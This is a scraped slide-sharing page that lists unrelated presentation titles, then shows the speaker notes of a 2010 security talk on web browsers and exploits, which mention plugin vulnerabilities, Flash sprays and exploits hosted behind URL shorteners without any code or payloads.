Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
PicPay - GenAI Finance Assistant - ChatGPT for Customer Service
PicPay - GenAI Finance Assistant - ChatGPT for Customer ServicePicPay - GenAI Finance Assistant - ChatGPT for Customer Service
PicPay - GenAI Finance Assistant - ChatGPT for Customer Service
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
Digital magic. A small project for controlling smart light bulbs.
Digital magic. A small project for controlling smart light bulbs.Digital magic. A small project for controlling smart light bulbs.
Digital magic. A small project for controlling smart light bulbs.
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 
Spring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdfSpring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdf
 
Babel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptxBabel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptx
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 

W.E.B. 2010 - Web, Exploits, Browsers

  • 1.
  • 2.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 13.
  • 14.
  • 15.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 23.
  • 25.
  • 26.
  • 27.
  • 28.
  • 29.
  • 31.
  • 32.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.

Notas do Editor

  1. Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE-plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  2. Slew of recent Java vulnerabilities. Latest one being the command exec vuln with JavaWebStart. Quicktime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  3. Flash Sprays
  4. URL Shorteners, can host an entire exploit.
  5. 800+ Javascript events, Video, and more
  6. Sandboxing isn&apos;t the solution.